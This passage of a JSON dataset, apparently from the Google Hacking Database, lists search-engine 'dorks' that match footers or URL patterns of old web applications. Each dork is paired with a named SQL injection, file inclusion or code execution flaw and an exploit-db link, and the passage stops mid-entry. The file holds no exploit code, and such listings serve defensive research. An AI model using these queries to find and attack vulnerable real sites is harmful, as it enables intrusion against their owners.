"http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by:+PhotoPost+PHP+4.6%22+or+%22Powered+by:+PhotoPost+PHP+4.5%22", "shortDescription": "\"Powered by: PhotoPost PHP 4.6\" or \"Powered by: PhotoPost PHP 4.5\"", "textualDescription": "PhotoPost 4.6 (PP_PATH) Remote File Include Vulnerability - CVE: 2006-4828: http://www.exploit-db.com/exploits/2369" }, { "signatureReferenceNumber": "2501", "link": "https://www.exploit-db.com/ghdb/2501/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+odlican.net+cms+v.1.5", "shortDescription": "Powered by odlican.net cms v.1.5", "textualDescription": "odlican.net cms v.1.5 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/11340" }, { "signatureReferenceNumber": "2502", "link": "https://www.exploit-db.com/ghdb/2502/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+By+form2list", "shortDescription": "Powered By form2list", "textualDescription": "form2list (page.php id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8348" }, { "signatureReferenceNumber": "2503", "link": "https://www.exploit-db.com/ghdb/2503/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/_blogadata/", "shortDescription": "inurl:/_blogadata/", "textualDescription": "Blogator-script 0.95 (id_art) Remote SQL Injection Vulnerability - CVE: 2008-1763: http://www.exploit-db.com/exploits/5368" }, { "signatureReferenceNumber": "2505", "link": "https://www.exploit-db.com/ghdb/2505/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=SPBOARD+v4.5", "shortDescription": "SPBOARD v4.5", "textualDescription": "Sepal SPBOARD 4.5 (board.cgi) Remote Command Exec Vulnerability - CVE: 2008-4873: http://www.exploit-db.com/exploits/6864" }, { "signatureReferenceNumber": "2506", "link": "https://www.exploit-db.com/ghdb/2506/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_jmarket", "shortDescription": "inurl:com_jmarket", "textualDescription": "joomla com_jmarket SQLi Vulnerability: http://www.exploit-db.com/exploits/13799" }, { "signatureReferenceNumber": "2507", "link": "https://www.exploit-db.com/ghdb/2507/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_jtickets", "shortDescription": "inurl:com_jtickets", "textualDescription": "joomla com_jtickets SQLi Vulnerability: http://www.exploit-db.com/exploits/13797" }, { "signatureReferenceNumber": "2509", "link": "https://www.exploit-db.com/ghdb/2509/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_rwcards%22", "shortDescription": "inurl:\"com_rwcards\"", "textualDescription": "Joomla Component com_rwcards - Local File Inclusion: http://www.exploit-db.com/exploits/11772" }, { "signatureReferenceNumber": "2510", "link": "https://www.exploit-db.com/ghdb/2510/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22index.php%3Fsbjoke_id%3D%22", "shortDescription": "\"index.php?sbjoke_id=\"", "textualDescription": "Jokes & Funny Pics Script (sb_jokeid) SQL Injection Vulnerability - CVE: 2008-2874: http://www.exploit-db.com/exploits/5934" }, { "signatureReferenceNumber": "2511", "link": "https://www.exploit-db.com/ghdb/2511/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22This+website+was+created+with+phpWebThings%22", "shortDescription": "\"This website was created with phpWebThings\"", "textualDescription": "phpWebThings 1.5.2 (editor.php) Remote File Include Vulnerability - CVE: 2006-6042: http://www.exploit-db.com/exploits/2811" }, { "signatureReferenceNumber": "2512", "link": "https://www.exploit-db.com/ghdb/2512/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:questions.php%3Fidcat", "shortDescription": "inurl:questions.php?idcat", "textualDescription": "EsFaq 2.0 (idcat) Remote SQL Injection Vulnerability - CVE: 2008-3952: http://www.exploit-db.com/exploits/6383" }, { "signatureReferenceNumber": "2513", "link": "https://www.exploit-db.com/ghdb/2513/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=photokorn+1.52", "shortDescription": "photokorn 1.52", "textualDescription": "PhotoKorn Gallery 1.52 (dir_path) Remote File Include Vulnerabilities - CVE: 2006-4670: http://www.exploit-db.com/exploits/2327" }, { "signatureReferenceNumber": "2514", "link": "https://www.exploit-db.com/ghdb/2514/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+SAPID+CMF+Build+87", "shortDescription": "Powered by SAPID CMF Build 87", "textualDescription": "SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability - CVE: 2007-5056: http://www.exploit-db.com/exploits/5097" }, { "signatureReferenceNumber": "2515", "link": "https://www.exploit-db.com/ghdb/2515/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22directory.php%3Fcat%3D%22+pubs", "shortDescription": "inurl:\"directory.php?cat=\" pubs", "textualDescription": "Prozilla Pub Site Directory (directory.php cat) SQL Injection Vulnerbility - CVE: 2007-4258: http://www.exploit-db.com/exploits/4265" }, { "signatureReferenceNumber": "2517", "link": "https://www.exploit-db.com/ghdb/2517/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22userjournals.php%3Fblog.%22", "shortDescription": "inurl:\"userjournals.php?blog.\"", "textualDescription": "e107 Plugin userjournals_menu (blog.id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8417" }, { "signatureReferenceNumber": "2518", "link": "https://www.exploit-db.com/ghdb/2518/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_youtube%22", "shortDescription": "inurl:\"com_youtube\"", "textualDescription": "Joomla Component (com_youtube) SQL Injection Vulnerability - CVE: 2010-2923: http://www.exploit-db.com/exploits/14467" }, { "signatureReferenceNumber": "2519", "link": "https://www.exploit-db.com/ghdb/2519/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22index.php%3Fserverid%3D%22", "shortDescription": "inurl:\"index.php?serverid=\"", "textualDescription": "Ultrastats 0.2.144/0.3.11 (index.php serverid) SQL Injection Vulnerability - CVE: 2008-6260: http://www.exploit-db.com/exploits/7148" }, { "signatureReferenceNumber": "2523", "link": "https://www.exploit-db.com/ghdb/2523/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_photoblog%22", "shortDescription": "inurl:\"com_photoblog\"", "textualDescription": "Joomla (com_photoblog) Blind Sql Injection Vulnerability - CVE: 2010-0610: http://www.exploit-db.com/exploits/11337" }, { "signatureReferenceNumber": "2524", "link": "https://www.exploit-db.com/ghdb/2524/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:indexmess.php", "shortDescription": "inurl:indexmess.php", "textualDescription": "Messagerie Locale (centre.php) Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/2832" }, { "signatureReferenceNumber": "2525", "link": "https://www.exploit-db.com/ghdb/2525/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+phpFaber+URLInn.+Copyright+%C3%82%C2%A9+2004-2006+phpFaber", "shortDescription": "Powered by phpFaber URLInn. Copyright \u00c2\u00a9 2004-2006 phpFaber", "textualDescription": "phpFaber URLInn 2.0.5 (dir_ws) Remote File Inclusion Vulnerability - CVE: 2007-5754: http://www.exploit-db.com/exploits/4588" }, { "signatureReferenceNumber": "2526", "link": "https://www.exploit-db.com/ghdb/2526/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_joomradio", "shortDescription": "inurl:com_joomradio", "textualDescription": "Joomla Component joomradio 1.0 (id) SQL Injection Vulnerability - CVE: 2008-2633: http://www.exploit-db.com/exploits/5729" }, { "signatureReferenceNumber": "2527", "link": "https://www.exploit-db.com/ghdb/2527/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_jnewsletter", "shortDescription": "inurl:com_jnewsletter", "textualDescription": "joomla com_jnewsletter SQLi Vulnerability: http://www.exploit-db.com/exploits/13804" }, { "signatureReferenceNumber": "2528", "link": "https://www.exploit-db.com/ghdb/2528/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:inc_classifiedlistingsmanager.asp", "shortDescription": "inurl:inc_classifiedlistingsmanager.asp", "textualDescription": "DMXReady Classified Listings Manager 1.1 SQL Injection Vulnerability - CVE: 2009-0426: http://www.exploit-db.com/exploits/7767" }, { "signatureReferenceNumber": "2529", "link": "https://www.exploit-db.com/ghdb/2529/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Online+Guestbook+Pro", "shortDescription": "Powered by Online Guestbook Pro", "textualDescription": "Online Guestbook Pro (display) Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8475" }, { "signatureReferenceNumber": "2531", "link": "https://www.exploit-db.com/ghdb/2531/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+PG+Online+Training+Solution+-+learning+management+system%22", "shortDescription": "\"Powered by PG Online Training Solution - learning management system\"", "textualDescription": "Pilot Group eTraining (news_read.php id) SQL Injection Vulnerability - CVE: 2008-4709: http://www.exploit-db.com/exploits/6613" }, { "signatureReferenceNumber": "2532", "link": "https://www.exploit-db.com/ghdb/2532/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22track.php%3Fid%3D%22", "shortDescription": "inurl:\"track.php?id=\"", "textualDescription": "phpstore Wholesale (track.php?id) SQL Injection Vulnerability - CVE: 2008-5493: http://www.exploit-db.com/exploits/7134" }, { "signatureReferenceNumber": "2533", "link": "https://www.exploit-db.com/ghdb/2533/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_jcommunity", "shortDescription": "inurl:com_jcommunity", "textualDescription": "joomla com_jcommunity SQLi Vulnerability: http://www.exploit-db.com/exploits/13798" }, { "signatureReferenceNumber": "2534", "link": "https://www.exploit-db.com/ghdb/2534/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:cart.php%3Fm%3Dfeatures%26id%3D", "shortDescription": "inurl:cart.php?m=features&id=", "textualDescription": "digiSHOP SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15405" }, { "signatureReferenceNumber": "2537", "link": "https://www.exploit-db.com/ghdb/2537/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=/modules/tadbook2/open_book.php%3Fbook_sn%3D", "shortDescription": "/modules/tadbook2/open_book.php?book_sn=", "textualDescription": "XOOPS Module tadbook2 (open_book.php book_sn) SQL Injection Vuln: http://www.exploit-db.com/exploits/7725" }, { "signatureReferenceNumber": "2540", "link": "https://www.exploit-db.com/ghdb/2540/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=''links.asp%3FCatId''", "shortDescription": "''links.asp?CatId''", "textualDescription": "ASPapp (links.asp CatId) Remote SQL Injection Vulnerability - CVE: 2008-1430: http://www.exploit-db.com/exploits/5276" }, { "signatureReferenceNumber": "2541", "link": "https://www.exploit-db.com/ghdb/2541/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Bu+Site+Ticimax+E-Ticaret+yaz%C4%B1l%C4%B1m%C4%B1+ile+haz%C4%B1rlanm%C4%B1%C5%9Ft%C4%B1r.%22", "shortDescription": "\"Bu Site Ticimax E-Ticaret yaz\u0131l\u0131m\u0131 ile haz\u0131rlanm\u0131\u015ft\u0131r.\"", "textualDescription": "Ticimax E-Ticaret ( SQL Injection ): http://www.exploit-db.com/exploits/12841" }, { "signatureReferenceNumber": "2542", "link": "https://www.exploit-db.com/ghdb/2542/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+NKINFOWEB+VSp+%C2%A9+2009", "shortDescription": "Powered by NKINFOWEB VSp \u00a9 2009", "textualDescription": "NKINFOWEB SQL Injection - CVE: 2010-1599: http://www.exploit-db.com/exploits/12354" }, { "signatureReferenceNumber": "2543", "link": "https://www.exploit-db.com/ghdb/2543/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by:+PHPDirector+0.30+or+nurl:videos.php%3Fid%3D", "shortDescription": "Powered by: PHPDirector 0.30 or nurl:videos.php?id=", "textualDescription": "PHPDirector 0.30 (videos.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14106" }, { "signatureReferenceNumber": "2544", "link": "https://www.exploit-db.com/ghdb/2544/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by:+++Arab+Portal++inurl:mod.php%3Fmod%3Dhtml", "shortDescription": "Powered by: Arab Portal inurl:mod.php?mod=html", "textualDescription": "Arab Portal 2.1 Remote File Disclosure Vulnerability - CVE: 2008-5787: http://www.exploit-db.com/exploits/7019" }, { "signatureReferenceNumber": "2545", "link": "https://www.exploit-db.com/ghdb/2545/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+RedCat%22+inurl:index.php%3FcontentId%3D", "shortDescription": "\"Powered by RedCat\" inurl:index.php?contentId=", "textualDescription": "redcat media SQL Injection: http://www.exploit-db.com/exploits/10043" }, { "signatureReferenceNumber": "2546", "link": "https://www.exploit-db.com/ghdb/2546/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22search_form.php%3Fsb_showresult%3D%22", "shortDescription": "inurl:\"search_form.php?sb_showresult=\"", "textualDescription": "Getacoder clone (sb_protype) Remote SQL Injection Vulnerability - CVE: 2008-3372: http://www.exploit-db.com/exploits/6143" }, { "signatureReferenceNumber": "2548", "link": "https://www.exploit-db.com/ghdb/2548/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+boastMachine+v3.1", "shortDescription": "Powered by boastMachine v3.1", "textualDescription": "boastMachine 3.1 (mail.php id) SQL Injection Vulnerability - CVE: 2008-0422: http://www.exploit-db.com/exploits/4952" }, { "signatureReferenceNumber": "2549", "link": "https://www.exploit-db.com/ghdb/2549/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22index.php%3Fsection%3Dpost_upload%22", "shortDescription": "\"index.php?section=post_upload\"", "textualDescription": "DDL-Speed Script (acp/backup) Admin Backup Bypass Vulnerability: http://www.exploit-db.com/exploits/7629" }, { "signatureReferenceNumber": "2551", "link": "https://www.exploit-db.com/ghdb/2551/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Copyright+2007,+PHPAUCTION.NET", "shortDescription": "Copyright 2007, PHPAUCTION.NET", "textualDescription": "phpAuction 3.2.1 (item.php id) Remote SQL Injection Vulnerability - CVE: 2008-2900: http://www.exploit-db.com/exploits/5892" }, { "signatureReferenceNumber": "2552", "link": "https://www.exploit-db.com/ghdb/2552/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Online+Booking+Manager2.2", "shortDescription": "Online Booking Manager2.2", "textualDescription": "Online Booking Manager 2.2 (id) SQL Injection Vulnerability - CVE: 2008-5194: http://www.exploit-db.com/exploits/5964" }, { "signatureReferenceNumber": "2553", "link": "https://www.exploit-db.com/ghdb/2553/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22cms+SunLight+5.2%22", "shortDescription": "\"cms SunLight 5.2\"", "textualDescription": "SunLight CMS 5.3 (root) Remote File Inclusion Vulnerabilities - CVE: 2007-2774: http://www.exploit-db.com/exploits/3953" }, { "signatureReferenceNumber": "2554", "link": "https://www.exploit-db.com/ghdb/2554/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=option%3Dcom_paxxgallery", "shortDescription": "option=com_paxxgallery", "textualDescription": "Joomla Component paxxgallery 0.2 (gid) Blind SQL Injection: http://www.exploit-db.com/exploits/5514" }, { "signatureReferenceNumber": "2555", "link": "https://www.exploit-db.com/ghdb/2555/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:index.php%3Foption%3Dcom_NeoRecruit", "shortDescription": "inurl:index.php?option=com_NeoRecruit", "textualDescription": "Joomla Component NeoRecruit 1.4 (id) SQL Injection Vulnerability - CVE: 2007-4506: http://www.exploit-db.com/exploits/4305" }, { "signatureReferenceNumber": "2557", "link": "https://www.exploit-db.com/ghdb/2557/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=powered+by+x7+chat+1.3.6b", "shortDescription": "powered by x7 chat 1.3.6b", "textualDescription": "X7CHAT v1.3.6b Add Admin: http://www.exploit-db.com/exploits/10931" }, { "signatureReferenceNumber": "2558", "link": "https://www.exploit-db.com/ghdb/2558/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Battle+Blog%22", "shortDescription": "\"Powered by Battle Blog\"", "textualDescription": "Battle Blog 1.25 (comment.asp) Remote SQL Injection Vulnerability - CVE: 2008-2626: http://www.exploit-db.com/exploits/5731" }, { "signatureReferenceNumber": "2559", "link": "https://www.exploit-db.com/ghdb/2559/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22vcalendar_asp%22", "shortDescription": "inurl:\"vcalendar_asp\"", "textualDescription": "VCalendar (VCalendar.mdb) Remote Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7180" }, { "signatureReferenceNumber": "2561", "link": "https://www.exploit-db.com/ghdb/2561/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_simpledownload%22", "shortDescription": "inurl:\"com_simpledownload\"", "textualDescription": "Joomla Component simpledownload Local File Disclosure - CVE: 2010-2122: http://www.exploit-db.com/exploits/12623" }, { "signatureReferenceNumber": "2562", "link": "https://www.exploit-db.com/ghdb/2562/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl+:%22/modules/tutorials/%22", "shortDescription": "allinurl :\"/modules/tutorials/\"", "textualDescription": "XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability - CVE: 2008-1351: http://www.exploit-db.com/exploits/5245" }, { "signatureReferenceNumber": "2563", "link": "https://www.exploit-db.com/ghdb/2563/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:Powered+by+Infront", "shortDescription": "intext:Powered by Infront", "textualDescription": "Infront SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13848" }, { "signatureReferenceNumber": "2564", "link": "https://www.exploit-db.com/ghdb/2564/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Info+Fisier.", "shortDescription": "Powered by Info Fisier.", "textualDescription": "Info Fisier 1.0 multiple Vulnerabilities: http://www.exploit-db.com/exploits/10728" }, { "signatureReferenceNumber": "2565", "link": "https://www.exploit-db.com/ghdb/2565/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=powered+by+joovili", "shortDescription": "powered by joovili", "textualDescription": "Joovili 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability - CVE: 2007-6621: http://www.exploit-db.com/exploits/4799" }, { "signatureReferenceNumber": "2566", "link": "https://www.exploit-db.com/ghdb/2566/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:Powered+by+SaphpLesson+4.0", "shortDescription": "intext:Powered by SaphpLesson 4.0", "textualDescription": "SaphpLesson v4.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-2883: http://www.exploit-db.com/exploits/9248" }, { "signatureReferenceNumber": "2568", "link": "https://www.exploit-db.com/ghdb/2568/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=infusions/triscoop_race_system/race_details.php%3F", "shortDescription": "infusions/triscoop_race_system/race_details.php?", "textualDescription": "PHP-Fusion Mod triscoop_race_system (raceid) SQL Injection Vuln: http://www.exploit-db.com/exploits/6684" }, { "signatureReferenceNumber": "2569", "link": "https://www.exploit-db.com/ghdb/2569/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+WHMCompleteSolution+-+or+++inurl:WHMCS", "shortDescription": "Powered by WHMCompleteSolution - or inurl:WHMCS", "textualDescription": "WHMCS control (WHMCompleteSolution) Sql Injection - CVE: 2010-1702: http://www.exploit-db.com/exploits/12371" }, { "signatureReferenceNumber": "2570", "link": "https://www.exploit-db.com/ghdb/2570/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22Event+List+0.8+Alpha+by+schlu.net+%22", "shortDescription": "intext:\"Event List 0.8 Alpha by schlu.net \"", "textualDescription": "Joomla Component EventList 0.8 (did) SQL Injection Vulnerability - CVE: 2007-4509: http://www.exploit-db.com/exploits/4309" }, { "signatureReferenceNumber": "2572", "link": "https://www.exploit-db.com/ghdb/2572/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22product_desc.php%3Fid%3D%22+Powered+by+Zeeways.com", "shortDescription": "inurl:\"product_desc.php?id=\" Powered by Zeeways.com", "textualDescription": "Zeeways Script Multiple Vulnerabilities - CVE: 2010-2144: http://www.exploit-db.com/exploits/12805" }, { "signatureReferenceNumber": "2573", "link": "https://www.exploit-db.com/ghdb/2573/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Website+powered+by+Subdreamer+CMS+%26+Sequel+Theme+Designed+by+indiqo.media%22", "shortDescription": "\"Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media\"", "textualDescription": "Subdreamer Pro v3.0.4 CMS upload Vulnerability: http://www.exploit-db.com/exploits/14101" }, { "signatureReferenceNumber": "2574", "link": "https://www.exploit-db.com/ghdb/2574/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=developed+by+ARWScripts.com", "shortDescription": "developed by ARWScripts.com", "textualDescription": "Free Photo Gallery Site Script (path) File Disclosure Vulnerability - CVE: 2008-1730: http://www.exploit-db.com/exploits/5419" }, { "signatureReferenceNumber": "2575", "link": "https://www.exploit-db.com/ghdb/2575/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+CMS+Made+Simple+version+1.1.2%22", "shortDescription": "\"powered by CMS Made Simple version 1.1.2\"", "textualDescription": "CMS Made Simple 1.2 Remote Code Execution Vulnerability - CVE: 2007-5056: http://www.exploit-db.com/exploits/4442" }, { "signatureReferenceNumber": "2577", "link": "https://www.exploit-db.com/ghdb/2577/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Desenvolvido+por+WeBProdZ%22", "shortDescription": "\"Desenvolvido por WeBProdZ\"", "textualDescription": "WeBProdZ CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12522" }, { "signatureReferenceNumber": "2579", "link": "https://www.exploit-db.com/ghdb/2579/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22inurl:file.php%3FrecordID%3D%22", "shortDescription": "inurl:\"inurl:file.php?recordID=\"", "textualDescription": "FILE SHARE v1.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10497" }, { "signatureReferenceNumber": "2580", "link": "https://www.exploit-db.com/ghdb/2580/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22view.php%3FItemID%3D%22+rating+%22rate+this+review%22", "shortDescription": "inurl:\"view.php?ItemID=\" rating \"rate this review\"", "textualDescription": "Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability - CVE: 2008-1783: http://www.exploit-db.com/exploits/5387" }, { "signatureReferenceNumber": "2581", "link": "https://www.exploit-db.com/ghdb/2581/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Webdesign+Cosmos+Solutions%22", "shortDescription": "\"Webdesign Cosmos Solutions\"", "textualDescription": "Cosmos Solutions cms SQL Injection Vulnerability ( id= / page= ): http://www.exploit-db.com/exploits/12794" }, { "signatureReferenceNumber": "2583", "link": "https://www.exploit-db.com/ghdb/2583/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:cal_cat.php%3Fop%3D", "shortDescription": "inurl:cal_cat.php?op=", "textualDescription": "Calendarix (cal_cat.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14393" }, { "signatureReferenceNumber": "2584", "link": "https://www.exploit-db.com/ghdb/2584/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_liveticker", "shortDescription": "inurl:com_liveticker", "textualDescription": "Joomla Component Live Ticker 1.0 (tid) Blind SQL Injection Vuln - CVE: 2008-6148: http://www.exploit-db.com/exploits/7573" }, { "signatureReferenceNumber": "2585", "link": "https://www.exploit-db.com/ghdb/2585/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22Powered+by+the+1-2-3+music+store%22", "shortDescription": "intext:\"Powered by the 1-2-3 music store\"", "textualDescription": "Easybe 1-2-3 Music Store (process.php) Remote SQL Injection Vuln - CVE: 2007-3520: http://www.exploit-db.com/exploits/4134" }, { "signatureReferenceNumber": "2588", "link": "https://www.exploit-db.com/ghdb/2588/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+myBusinessAdmin+and+Red+Cow+Technologies,+Inc.%22", "shortDescription": "\"Powered by myBusinessAdmin and Red Cow Technologies, Inc.\"", "textualDescription": "myBusinessAdmin (content.php) Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11327" }, { "signatureReferenceNumber": "2589", "link": "https://www.exploit-db.com/ghdb/2589/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+cityadmin+and+Red+Cow+Technologies,+Inc.%22", "shortDescription": "\"Powered by cityadmin and Red Cow Technologies, Inc.\"", "textualDescription": "cityadmin (links.php) Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11326" }, { "signatureReferenceNumber": "2590", "link": "https://www.exploit-db.com/ghdb/2590/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+RealAdmin+and+Red+Cow+Technologies,+Inc.%22", "shortDescription": "\"Powered by RealAdmin and Red Cow Technologies, Inc.\"", "textualDescription": "RealAdmin (detail.php) Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11325" }, { "signatureReferenceNumber": "2591", "link": "https://www.exploit-db.com/ghdb/2591/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%3Faction%3Dpro_show+and+%3Faction%3Ddisppro", "shortDescription": "?action=pro_show and ?action=disppro", "textualDescription": "EPShop 3.0 (pid) Remote SQL Injection Vulnerability - CVE: 2008-3412: http://www.exploit-db.com/exploits/6139" }, { "signatureReferenceNumber": "2592", "link": "https://www.exploit-db.com/ghdb/2592/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+WebspotBlogging", "shortDescription": "Powered by WebspotBlogging", "textualDescription": "bspotBlogging 3.0.1 (path) Remote File Include Vulnerability - CVE: 2006-2860: http://www.exploit-db.com/exploits/1871" }, { "signatureReferenceNumber": "2593", "link": "https://www.exploit-db.com/ghdb/2593/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+vsp+stats+processor%22", "shortDescription": "\"powered by vsp stats processor\"", "textualDescription": "vsp stats processor 0.45 (gamestat.php gameID) SQL Injection Vuln - CVE: 2009-1224: http://www.exploit-db.com/exploits/8331" }, { "signatureReferenceNumber": "2594", "link": "https://www.exploit-db.com/ghdb/2594/", "category": 